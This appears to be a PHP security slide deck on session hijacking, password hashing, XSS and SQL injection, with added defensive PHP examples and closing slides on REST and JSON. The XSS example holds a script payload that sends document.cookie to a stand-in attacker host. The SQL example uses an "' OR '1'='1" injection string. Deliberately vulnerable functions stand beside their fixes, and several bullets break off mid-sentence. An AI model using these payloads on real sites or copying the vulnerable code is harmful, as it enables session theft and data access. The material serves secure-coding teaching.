PHP Security
Presented by:

Index
• Introduction
• PHP & Security
• Session Hijacking
• Types Of Session Hijacking
• Protection Against Session Hijacking
• Preventing XSS
• SQL Injection
• How SQL Injection Works
• Goals Of SQL Injection
• XSS
Introduction
• Security is a measurement, not a characteristic.
• It is also a growing problem that requires a continually evolving solution.
• A good measure of

PHP & Security
• PHP keeps on growing as a language, making headway into enterprise and corporate markets.
• Consequently, PHP applications
Session Hijacking
• TCP session hijacking is when an attacker takes over an established TCP session between two machines.
• Since most authentication only occurs at the start of a TCP session, this allows the
• In a PHP web application the equivalent is stealing the session identifier (the PHPSESSID cookie): whoever presents a valid ID is treated as the authenticated user, so an ID leaked over plaintext HTTP, read out by injected script (XSS), or chosen by the attacker in advance (session fixation) hands over the login.

Types of Session Hijacking

Protection Against Session Hijacking
• Use encryption
• Use a secure protocol (TLS for the whole session, not only for the login page)
• Limit incoming connections
• Minimize remote access
• In PHP: regenerate the session ID on login, send the session cookie with the HttpOnly and Secure flags, and refuse IDs the server did not issue (session.use_strict_mode)
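The PHP-side counterpart of the list above, as an added example that is not part of the original deck: session settings and a login/logout pair that close the hijacking and fixation paths the previous slide describes. It assumes PHP 7.3 or later (for the array forms of session_set_cookie_params and setcookie with a 'samesite' key) and that the site is served over HTTPS; the function names are the example's own.

```php
<?php
// Added example, not from the original deck: hardening PHP's own session
// handling against hijacking and fixation. Assumes PHP >= 7.3 (array form
// of session_set_cookie_params/setcookie with 'samesite') and HTTPS.
declare(strict_types=1);

// Reject session IDs the server never issued, which defeats session fixation
// (an attacker planting a known ID in the victim's browser before login).
ini_set('session.use_strict_mode', '1');
// Accept the ID only from the cookie, never from the URL.
ini_set('session.use_only_cookies', '1');

// HttpOnly keeps script (injected via XSS) from reading PHPSESSID, Secure keeps
// it off plaintext HTTP, SameSite stops most cross-site requests carrying it.
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'domain'   => '',
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Lax',
]);
session_start();

// Call after the credentials have been verified. Rotating the ID here means
// an ID fixed or sniffed before login is worthless afterwards.
function login_user(int $userId): void
{
    session_regenerate_id(true);   // true: discard the old session data as well
    $_SESSION['user_id']  = $userId;
    $_SESSION['login_at'] = time();
    $_SESSION['ua_hash']  = hash('sha256', $_SERVER['HTTP_USER_AGENT'] ?? '');
}

// Run on every request that needs a logged-in user. The User-Agent binding is
// a weak signal (the header is attacker-controlled), but a bound session whose
// agent changes mid-flight is worth ending; the absolute lifetime bounds how
// long a stolen ID stays useful.
function require_login(int $maxLifetime = 1800): int
{
    $uaHash = hash('sha256', $_SERVER['HTTP_USER_AGENT'] ?? '');
    if (empty($_SESSION['user_id'])
        || ($_SESSION['ua_hash'] ?? '') !== $uaHash
        || time() - (int) ($_SESSION['login_at'] ?? 0) > $maxLifetime) {
        logout_user();
        http_response_code(401);
        exit('Please log in again.');
    }
    return (int) $_SESSION['user_id'];
}

// Clear the server-side state and expire the cookie in the browser.
function logout_user(): void
{
    $_SESSION = [];
    $p = session_get_cookie_params();
    setcookie(session_name(), '', [
        'expires'  => time() - 3600,
        'path'     => $p['path'],
        'domain'   => $p['domain'],
        'secure'   => $p['secure'],
        'httponly' => $p['httponly'],
        'samesite' => $p['samesite'] ?? 'Lax',
    ]);
    session_destroy();
}
```

The ini_set calls only work if they run before session_start(); in production put them in php.ini or the server configuration so no code path can start a session with the defaults.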
Input Validation
• One of the key concepts you must accept is that user input is unreliable and not to be trusted.
  – It may be partially lost in transmission between server and client.
  – It may be corrupted by some in-between process.
  – It may be crafted deliberately by an attacker.
Strong Password
• Do not store passwords as plain text.
• Do not try to invent your own password security.
• Do not encrypt passwords: encryption is reversible, and whoever obtains the key obtains every password. Security through

Strong Password
• Do not use MD5. Although this cryptographic hash function is irreversible, it is fast and unsalted, so it is quite easy to make a list of millions of hashed passwords (a rainbow table) and compare the
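What the slide recommends instead of MD5, as an added example that is not from the original deck: PHP's password_hash/password_verify API (PHP 5.5 and later), which uses bcrypt with a random per-user salt and a tunable cost. The $users array stands in for a database table and is a constructed sample; the function names are the example's own.

```php
<?php
// Added example, not from the original deck: password storage with PHP's
// password_* API. $users is a constructed stand-in for a members table.
declare(strict_types=1);

const HASH_OPTIONS = ['cost' => 12];   // raise over time as hardware gets faster

function register(array &$users, string $username, string $password): void
{
    // bcrypt with a random salt chosen by PHP; algorithm, cost and salt are all
    // embedded in the returned string, so only this one column needs storing.
    $users[$username] = password_hash($password, PASSWORD_DEFAULT, HASH_OPTIONS);
}

function login(array &$users, string $username, string $password): bool
{
    static $dummy = null;
    if ($dummy === null) {
        // A real hash to verify against when the user does not exist, so the
        // response time does not reveal which usernames are valid.
        $dummy = password_hash('no-such-user', PASSWORD_DEFAULT, HASH_OPTIONS);
    }
    $exists = isset($users[$username]);
    $ok = password_verify($password, $exists ? $users[$username] : $dummy) && $exists;

    // Transparent upgrade: if the default algorithm or cost has changed since
    // this hash was made, rehash now while the plaintext is available.
    if ($ok && password_needs_rehash($users[$username], PASSWORD_DEFAULT, HASH_OPTIONS)) {
        $users[$username] = password_hash($password, PASSWORD_DEFAULT, HASH_OPTIONS);
    }
    return $ok;
}

$users = [];
register($users, 'alice', 'correct horse battery staple');
var_dump(login($users, 'alice', 'correct horse battery staple'));
var_dump(login($users, 'alice', 'wrong password'));
var_dump(login($users, 'nobody', 'anything'));
```

password_verify does a constant-time comparison of the recomputed hash, so the application never compares hash strings itself; the dummy-hash branch keeps the "unknown user" path as slow as the "wrong password" path.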
XSS
• Cross-Site Scripting (XSS) is a situation where an attacker injects HTML or JavaScript, which the application then displays on the page without encoding it, so it runs in other users' browsers.

XSS Condition
1. A Web application accepts user input (well, which Web application doesn't?)
2. The input is used to create dynamic content
Who Is Affected By XSS
• The XSS attack's first target is the client
  – The client trusts the server (does not expect an attack)
  – The browser executes the malicious script

Impact Of XSS Attack
• Access to authentication credentials for the Web application
  – Cookies, username and password
• XSS is not a harmless flaw!
• Normal users
  – Access to personal data (credit card, bank account)
  – Access to business data (bid details, construction details)
  – Misuse of the account (order expensive goods)

Impact Of XSS Attack
• Denial of service
  – Crash the user's browser, pop-up flooding, redirection
• Access to the user's machine
  – Use ActiveX objects (historically, in Internet Explorer) to control the machine

Preventing XSS
Preventing XSS means preventing:
• Subversion of the separation between clients
  – An attacker can access affected clients' data
  – Industrial espionage
• Identity theft
  – An attacker can impersonate
XSS Solution
• Implement XSS prevention in the application
• Do not assume input values are benign
• Do not trust client-side validation
• Check and validate all
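The reflected XSS described on the previous slides beside the fix, as an added example that is not from the original deck: a page that concatenates a request value into HTML, and the context-aware encoding that stops the injected script from running. The $payload string and the helper names (e, safe_href, js_value) are constructed for the example.

```php
<?php
// Added example, not from the original deck: reflected XSS and its fix.
// $payload is a constructed attack string, not captured traffic.
declare(strict_types=1);

// VULNERABLE: untrusted input is concatenated straight into HTML.
function greet_vulnerable(string $name): string
{
    return "<p>Hello, $name!</p>";
}

// Encode for the HTML body/attribute context. ENT_QUOTES also escapes the
// single quote, so the value is safe inside single-quoted attributes too; the
// explicit charset avoids mismatches between PHP and the page encoding.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// HARDENED: same page, value encoded at the point of output.
function greet_safe(string $name): string
{
    return '<p>Hello, ' . e($name) . '!</p>';
}

// href/src need a scheme allow-list on top of encoding: "javascript:" contains
// no character that htmlspecialchars touches. Relative URLs are rejected here;
// loosen deliberately if the application needs them.
function safe_href(string $url): string
{
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return '#';
    }
    return e($url);
}

// Values handed to inline JavaScript: JSON-encode with the HTML-safe flags so
// "</script>" inside the data cannot close the script element.
function js_value($value): string
{
    return json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

$payload = '<script>location="https://attacker.example/?c="+document.cookie</script>';
echo greet_vulnerable($payload), PHP_EOL;   // the script element reaches the browser intact
echo greet_safe($payload), PHP_EOL;         // rendered as visible text instead
echo '<a href="', safe_href('javascript:alert(1)'), '">link</a>', PHP_EOL;
echo '<script>var name = ', js_value($payload), ';</script>', PHP_EOL;
```

The encoding function depends on where the value lands (HTML text, attribute, URL, JavaScript), which is why a single "sanitize on input" step cannot substitute for encoding at output.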
What To Consider As "Input"
• Not only field values with user-supplied input
• Should be treated as input:
  – All field values, even hidden fields
  – All HTTP header fields, e.g. Referer
  – And even the

How To Perform Input Validation
• Check whether the input is what you expect
• Do not try to check for "bad input": blacklist testing is no solution
• Validation limits what gets in; it does not replace encoding output for the context it is displayed in (HTML body, attribute, JavaScript, URL)
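Allow-list validation as the two slides above describe it, written out as an added example that is not from the original deck: every expected field gets a rule stating what it must be, unknown parameters (including tampered hidden fields) are dropped, and nothing is searched for "bad" substrings. The rule set, the validate() helper and the sample request are constructed for the example.

```php
<?php
// Added example, not from the original deck: allow-list input validation.
// The rules and the $request array are constructed samples.
declare(strict_types=1);

// Validate $input against $rules; returns [cleanValues, errors]. Only fields
// named in $rules survive, so extra or hidden parameters never reach the app.
function validate(array $input, array $rules): array
{
    $clean  = [];
    $errors = [];
    foreach ($rules as $field => $rule) {
        $raw = $input[$field] ?? null;
        if ($raw === null || $raw === '') {
            if (!empty($rule['required'])) {
                $errors[$field] = 'missing';
            }
            continue;
        }
        if (!is_string($raw)) {              // e.g. field[]=x where a scalar is expected
            $errors[$field] = 'wrong type';
            continue;
        }
        switch ($rule['type']) {
            case 'int':
                $v = filter_var($raw, FILTER_VALIDATE_INT, ['options' => [
                    'min_range' => $rule['min'] ?? PHP_INT_MIN,
                    'max_range' => $rule['max'] ?? PHP_INT_MAX,
                ]]);
                break;
            case 'email':
                $v = filter_var($raw, FILTER_VALIDATE_EMAIL);
                break;
            case 'enum':
                $v = in_array($raw, $rule['values'], true) ? $raw : false;
                break;
            case 'regex':
                $v = preg_match($rule['pattern'], $raw) === 1 ? $raw : false;
                break;
            default:
                $v = false;                   // unknown rule type: fail closed
        }
        if ($v === false) {
            $errors[$field] = 'invalid';
        } else {
            $clean[$field] = $v;
        }
    }
    return [$clean, $errors];
}

$rules = [
    'user_id'  => ['type' => 'int',   'required' => true, 'min' => 1],
    'email'    => ['type' => 'email', 'required' => true],
    'role'     => ['type' => 'enum',  'values' => ['viewer', 'editor']],
    // Anchored to the whole string; the D modifier keeps $ from matching
    // before a trailing newline.
    'username' => ['type' => 'regex', 'required' => true, 'pattern' => '/^[a-z0-9_]{3,20}$/D'],
];

// Constructed request: a tampered hidden field and an injected extra key.
$request = [
    'user_id'  => '42',
    'email'    => 'alice@example.com',
    'role'     => 'admin',       // not in the allow-list: rejected
    'username' => "alice\n",     // trailing newline: rejected thanks to /D
    'is_admin' => '1',           // not in the rules: silently dropped
];

[$clean, $errors] = validate($request, $rules);
var_dump($clean, $errors);
```

Note that the int rule returns a typed integer, not the original string, so the value handed to the rest of the application is already in the shape the code expects.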
SQL Injection
• SQL injection is similar to XSS in that unvalidated data is being used, but in this case the data is passed to the database.
  – Arbitrary query execution
  – Removal of data

SQL Injection
• SQL injection vulnerabilities come in two main forms.
• Both forms involve injecting SQL code into a website.
• (1) Injecting into a form, such as the username and password boxes

Goals Of SQL Injection
• Your goal as an injector is to outsmart the SQL server.
• Microsoft SQL Server is normally running as either the local system account or a domain user account, an

Goals Of SQL Injection
• An attacker might use the xp_reg* extended stored procedures (specific to Microsoft SQL Server) to read the SAM, change the configuration of a system service, etc.

How SQL Injection Works
• Before you protect against an injection, you must first understand how SQL works.
• The username and password you entered are kept in the site's member table.
• The login form takes the

Escape SQL
• If the database interface extension offers dedicated escaping functions, USE THEM!
  – MySQL
    • mysql_escape_string()
    • mysql_real_escape_string()
• Caveat: the mysql_* extension is deprecated since PHP 5.5 and removed in PHP 7.0; mysql_escape_string() also ignores the connection character set, which is what mysql_real_escape_string() was added to fix. The current equivalents are mysqli_real_escape_string() and PDO::quote().
• Escaping only protects a quoted string literal; a value placed in an unquoted numeric position (WHERE id = $id) is still injectable. Prepared statements with bound parameters keep the query text and the data apart regardless of context, so prefer them over escaping.
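The login lookup the "How SQL Injection Works" slide describes, as an added example that is not from the original deck: once built by string concatenation, once as a PDO prepared statement, run against the same in-memory SQLite database so it works offline. The members table, its single row and the attack string are constructed for the example.

```php
<?php
// Added example, not from the original deck: the member lookup behind a login
// form, vulnerable and fixed. In-memory SQLite via PDO; the table and row are
// constructed samples.
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE members (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT)');
$ins = $db->prepare('INSERT INTO members (username, pw_hash) VALUES (?, ?)');
$ins->execute(['alice', password_hash('s3cret', PASSWORD_DEFAULT)]);

// VULNERABLE: the classic "WHERE username = '$username'" concatenation.
function find_member_vulnerable(PDO $db, string $username): ?array
{
    $sql = "SELECT id, username, pw_hash FROM members WHERE username = '$username'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// SAFE: the query text is fixed; the value travels separately as a parameter
// and can never change the statement's structure.
function find_member(PDO $db, string $username): ?array
{
    $stmt = $db->prepare('SELECT id, username, pw_hash FROM members WHERE username = ?');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// Compare the password in PHP, never in SQL: the hash never appears in a query.
function login(PDO $db, string $username, string $password): bool
{
    $row = find_member($db, $username);
    return $row !== null && password_verify($password, $row['pw_hash']);
}

$attack = "' OR '1'='1";
// Concatenated: the quote closes the literal, OR '1'='1' is true for every
// row, and the attacker receives alice's record without knowing her name.
var_dump(find_member_vulnerable($db, $attack));
// Prepared: the whole payload is compared as a username and matches nothing.
var_dump(find_member($db, $attack));
var_dump(login($db, 'alice', 's3cret'));
```

With pdo_mysql, also set PDO::ATTR_EMULATE_PREPARES to false so that binding happens on the server rather than by client-side quoting in the driver.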
Questions?

Thank You
REST Web Services
● Representational State Transfer defines a set of architectural principles by which we can design Web services that focus on a system's resources, including how resource states are addressed and transferred over HTTP by a wide range of clients written in different languages.
● REST has emerged in the last few years as a predominant Web service design model.
● REST has had such a large impact on the Web that it has mostly displaced SOAP- and WSDL-based interface design, because it is a considerably simpler style to use.

Design
A REST Web service follows four basic design principles:
● Use HTTP methods explicitly.
● Be stateless.
● Expose directory-structure-like URIs.
● Transfer XML, JavaScript Object Notation (JSON), or both.

Use HTTP Methods Explicitly
● REST asks developers to use HTTP methods explicitly and in a way that is consistent with the protocol definition.
● This basic REST design principle establishes a one-to-one mapping between create, read, update, and delete (CRUD) operations and HTTP methods.

Use HTTP Methods Explicitly (cont.)
According to this mapping:
● To create a resource on the server, use POST.
● To retrieve a resource, use GET.
● To change the state of a resource or to update it, use PUT.
● To remove or delete a resource, use DELETE.
● Security check: GET must have no side effects. Any page can make a victim's browser issue a GET (a link, an image tag), so a state-changing action reachable by GET is an open door to cross-site request forgery.
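The mapping above enforced in code, as an added example that is not from the original deck or the material it draws on: a small PHP front controller for a /software-instances collection that routes each HTTP method to exactly one CRUD action and answers 405 with an Allow header for anything else. The route, the in-memory $store and the dispatch() function are constructed for the example; a real service would back them with a database and authentication.

```php
<?php
// Added example, not from the original deck: explicit HTTP-method dispatch
// for one resource collection. $store is a constructed stand-in for a table.
declare(strict_types=1);

$store = [200003 => ['hostname' => 'AB123456', 'componentversion' => '7.5']];

// Returns [httpStatus, bodyOrNull]. Everything needed to answer is in the
// request itself (stateless); the store is passed in rather than kept in a session.
function dispatch(string $method, string $path, ?string $body, array &$store): array
{
    // Routes: /software-instances (collection) or /software-instances/{id} (item)
    if (!preg_match('#^/software-instances(?:/(\d+))?$#D', $path, $m)) {
        return [404, ['error' => 'not found']];
    }
    $id = isset($m[1]) ? (int) $m[1] : null;
    $payload = $body !== null ? json_decode($body, true) : null;

    // The explicit method set for each kind of URI; anything else is refused.
    $allowed = $id === null ? ['GET', 'POST'] : ['GET', 'PUT', 'DELETE'];
    if (!in_array($method, $allowed, true)) {
        header('Allow: ' . implode(', ', $allowed));
        return [405, ['error' => 'method not allowed']];
    }

    switch ($method) {
        case 'GET':       // read: safe, no side effects
            if ($id === null) {
                return [200, $store];
            }
            return isset($store[$id]) ? [200, $store[$id]] : [404, ['error' => 'not found']];
        case 'POST':      // create: the server chooses the identifier
            if (!is_array($payload)) {
                return [400, ['error' => 'body must be a JSON object']];
            }
            $newId = $store ? max(array_keys($store)) + 1 : 1;
            $store[$newId] = $payload;
            header("Location: /software-instances/$newId");
            return [201, $store[$newId]];
        case 'PUT':       // update: full replacement, idempotent
            if (!is_array($payload)) {
                return [400, ['error' => 'body must be a JSON object']];
            }
            $store[$id] = $payload;
            return [200, $store[$id]];
        case 'DELETE':    // delete: idempotent, nothing to return
            unset($store[$id]);
            return [204, null];
    }
    return [500, ['error' => 'unreachable']];
}

[$status, $result] = dispatch(
    $_SERVER['REQUEST_METHOD'] ?? 'GET',
    parse_url($_SERVER['REQUEST_URI'] ?? '/', PHP_URL_PATH) ?: '/',
    file_get_contents('php://input') ?: null,
    $store
);
http_response_code($status);
if ($result !== null) {
    header('Content-Type: application/json');
    echo json_encode($result);
}
```

Because only GET is allowed to be side-effect free here, a cross-site link or image can at most read; creating, replacing and deleting require a method a plain navigation cannot produce.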
Be Stateless
● The client–server communication is further constrained by no client context being stored on the server between requests. Each request from any client contains all of the information necessary to service the request, and any session state is held in the client.

Expose Directory-Structure-Like URIs
Some guidelines about URI structure for a RESTful Web service are:
● Hide the server-side scripting technology file extensions (.jsp, .php, .asp), if any, so you can port to something else without changing the URIs.
● Keep everything lowercase.
● Substitute spaces with hyphens or underscores (one or the other).
● Avoid query strings as much as you can.
● Instead of using the 404 Not Found code if the request URI is for a partial path, always provide a default page or resource as a response.

Transfer XML, JSON, or Both
● The last set of constraints that goes into a RESTful Web service design has to do with the format of the data that the application and service exchange in the request/response payload or in the HTTP body. This is where it really pays to keep things simple, human-readable, and connected.
XML Representation
  <SoftwareInstance>
    <SoftwareInstanceId>200003</SoftwareInstanceId>
    <HostName>AB123456</HostName>
    <ServerName>LENOVO THINKPAD T410 XYZ123</ServerName>
    <ComponentId>45446</ComponentId>
    <ComponentName>IBM License Metric Tool</ComponentName>
    <ComponentVersion>7.5</ComponentVersion>
  </SoftwareInstance>

JSON Representation
  {
    "softwareinstanceid": 200003,
    "componentname": "IBM License Metric Tool",
    "servername": "LENOVO THINKPAD T410 XYZ123",
    "hostname": "AB123456",
    "componentid": 45446,
    "componentversion": "7.5"
  }
JSON
● JSON (JavaScript Object Notation) is a lightweight data interchange format.
● It is a text-based, human-readable format for representing objects and other data structures and is mainly used to transmit such structured data over a network connection (a process called serialization).
● JSON finds its main application in Ajax web application programming, as a simple alternative to XML for asynchronously transmitting structured information between client and server.

JSON Architecture
JSON is built on two structures:
● A collection of name/value pairs. In various languages, this is realized as an object, record, struct, dictionary, hash table, keyed list, or associative array.
● An ordered list of values. In most languages, this is realized as an array, vector, list, or sequence.

JSON Functions
JSON functions used in PHP:
● json_decode — decodes a JSON string
● json_encode — returns the JSON representation of a value
● json_last_error — returns the last error that occurred
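The three functions above used on an untrusted request body, as an added example that is not from the original deck: decoding with a nesting limit, explicit error handling, and a check that the document has the shape the SoftwareInstance representation on the earlier slide promises. It assumes PHP 7.3 or later for JSON_THROW_ON_ERROR (the json_last_error() form for older versions is shown alongside); the sample documents and the function names are constructed for the example.

```php
<?php
// Added example, not from the original deck: decoding JSON from an untrusted
// body with explicit errors and shape checks. Sample documents are constructed.
declare(strict_types=1);

function parse_software_instance(string $body): array
{
    // Depth limit: deeply nested input is a cheap way to exhaust the parser.
    // assoc=true gives arrays instead of stdClass objects.
    try {
        $data = json_decode($body, true, 16, JSON_THROW_ON_ERROR | JSON_BIGINT_AS_STRING);
    } catch (JsonException $e) {
        throw new InvalidArgumentException('malformed JSON: ' . $e->getMessage(), 0, $e);
    }
    // json_decode('null') and json_decode('42') are valid JSON but not a message.
    if (!is_array($data)) {
        throw new InvalidArgumentException('expected a JSON object');
    }
    // Valid JSON is not yet a valid message: check the keys and types you rely on.
    $required = [
        'softwareinstanceid' => 'integer',
        'hostname'           => 'string',
        'componentversion'   => 'string',
    ];
    foreach ($required as $key => $type) {
        if (!array_key_exists($key, $data) || gettype($data[$key]) !== $type) {
            throw new InvalidArgumentException("field '$key' missing or not $type");
        }
    }
    return $data;
}

// Pre-7.3 pattern: json_decode returns null on failure, which is also what it
// returns for the document "null", so the error state must be read explicitly.
function decode_legacy(string $body)
{
    $data = json_decode($body, true, 16);
    if (json_last_error() !== JSON_ERROR_NONE) {
        throw new InvalidArgumentException('malformed JSON: ' . json_last_error_msg());
    }
    return $data;
}

$good      = '{"softwareinstanceid":200003,"hostname":"AB123456","componentversion":"7.5"}';
$wrongType = '{"softwareinstanceid":"200003","hostname":"AB123456"}';
$truncated = '{"softwareinstanceid":200003,';

foreach ([$good, $wrongType, $truncated] as $doc) {
    try {
        print_r(parse_software_instance($doc));
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

The type check matters as much as the parse: "200003" and 200003 are both valid JSON values, and code that later uses the field as a database key or array index behaves differently for each.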